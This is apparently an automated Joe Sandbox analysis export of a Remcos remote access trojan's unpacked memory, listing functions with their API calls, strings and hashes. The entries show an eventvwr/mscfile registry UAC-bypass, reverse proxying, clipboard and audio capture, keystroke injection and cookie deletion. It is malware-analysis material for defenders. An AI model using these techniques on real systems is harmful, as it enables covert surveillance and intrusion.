Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ExecuteExitProcessShell
String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
API String ID: 1124553745-1488154373
Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE

Function 0041AA4F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00000001), ref: 0041AA5D
ShowWindow.USER32(00000000,00000000), ref: 0041AA76

Strings

--------------------------, xrefs: 0041AADE
3.8.0 Pro, xrefs: 0041AAC2
CONOUT$, xrefs: 0041AA89
--------------------------, xrefs: 0041AAA6
* BreakingSecurity.net, xrefs: 0041AAD0
* Remcos v, xrefs: 0041AAB4

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: AllocConsoleShowWindow
String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
API String ID: 4118500197-4025029772
Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D

Function 0041B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B

Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
TranslateMessage.USER32(?), ref: 0041B29E
DispatchMessageA.USER32(?), ref: 0041B2A8
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5

Strings

Remcos, xrefs: 0041B26D

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68

Function 00449F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B

Function 00413360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

udp, xrefs: 0041349C
tcp, xrefs: 004134C9

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A

Function 0040FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040FF79
inet_ntoa.WS2_32(?), ref: 00410014

Strings

GetDirectListeningPort, xrefs: 00410117
StartReverse, xrefs: 004100E4
StopForward, xrefs: 004100F5
StartForward, xrefs: 004100D8
StopReverse, xrefs: 00410106

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: 9f8430c51871c80c74665717bbf62fde7bb4a1b9aedcca63b22f363a7fcccbf8
Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
Opcode Fuzzy Hash: 9f8430c51871c80c74665717bbf62fde7bb4a1b9aedcca63b22f363a7fcccbf8
Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF

Function 004069F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36

Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3

Strings

.part, xrefs: 00406A1A

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A

Function 00417949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7

Function 00414F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00414F41
EmptyClipboard.USER32 ref: 00414F4F
CloseClipboard.USER32 ref: 00414F55
OpenClipboard.USER32 ref: 00414F5C
GetClipboardData.USER32(0000000D), ref: 00414F6C
GlobalLock.KERNEL32(00000000), ref: 00414F75
GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
CloseClipboard.USER32 ref: 00414F84

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID:
API String ID: 2172192267-0
Opcode ID: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
Opcode Fuzzy Hash: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A

Function 00444A81 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00444B89
__freea.LIBCMT ref: 00444C33
__freea.LIBCMT ref: 00444C51

Part of subcall function 00433BED: _free.LIBCMT ref: 00433C03

Strings

e]j[/, xrefs: 00444A89
am/pm, xrefs: 00444CB4
a/p, xrefs: 00444D18

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm$e]j[/
API String ID: 2936374016-4215891308
Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59

Function 0043BB4A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Strings

e]j[/, xrefs: 0043BB52

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID: e]j[/
API String ID: 0-424226671
Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9

Function 0044220D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B

_free.LIBCMT ref: 00442318
_free.LIBCMT ref: 0044232F
_free.LIBCMT ref: 0044234E
_free.LIBCMT ref: 00442369
_free.LIBCMT ref: 00442380

Strings

e]j[/, xrefs: 004423B1

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: e]j[/
API String ID: 3033488037-424226671
Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48

Function 00453DF4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00453F23

Strings

$-E, xrefs: 00453E47, 00453F38
$-E, xrefs: 00453EEA

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free
String ID: $-E$$-E
API String ID: 269201875-3140958853
Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A

Function 004412F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044136B
_free.LIBCMT ref: 0044138B

Strings

e]j[/, xrefs: 00441317, 004413AD

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free
String ID: e]j[/
API String ID: 269201875-424226671
Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84

Function 0044E30C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
__alloca_probe_16.LIBCMT ref: 0044E391
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
__freea.LIBCMT ref: 0044E3FD

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B

Strings

e]j[/, xrefs: 0044E314

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID: e]j[/
API String ID: 313313983-424226671
Opcode ID: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
Opcode Fuzzy Hash: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98

Function 00401CEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D30

Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9

waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F

Strings

%Y-%m-%d %H.%M, xrefs: 00401D21
.wav, xrefs: 00401D49

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav
API String ID: 3809562944-3597965672
Opcode ID: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
Opcode Fuzzy Hash: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E

Function 0040AE2A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
PathFileExistsA.SHLWAPI(?), ref: 0040AEB9

Strings

Cookies, xrefs: 0040AE3E
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040AE43
[IE cookies not found], xrefs: 0040AE81
[IE cookies cleared!], xrefs: 0040AF06, 0040AF2B

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
Opcode Fuzzy Hash: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA

Function 00453D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269

Function 0044E0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A

_free.LIBCMT ref: 0044E128

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044E133
_free.LIBCMT ref: 0044E13E
_free.LIBCMT ref: 0044E192
_free.LIBCMT ref: 0044E19D
_free.LIBCMT ref: 0044E1A8
_free.LIBCMT ref: 0044E1B3

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654

Function 004192AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34

Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD

StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327

Strings

ProductName, xrefs: 004192BD
(64 bit), xrefs: 00419353
(32 bit), xrefs: 0041935A
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004192C2, 004192CC, 0041930D
CurrentBuildNumber, xrefs: 00419308

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 1866151309-2070987746
Opcode ID: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
Opcode Fuzzy Hash: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA

Function 004380FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C

Function 0040A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
GetLastError.KERNEL32 ref: 0040AA28

Strings

[Chrome Cookies not found], xrefs: 0040AA42
UserProfile, xrefs: 0040A9EE
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
[Chrome Cookies found, cleared!], xrefs: 0040AA4E

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F

Function 0044083A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890

Strings

e]j[/, xrefs: 00440841
mscoree.dll, xrefs: 00440853
CorExitProcess, xrefs: 00440865

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

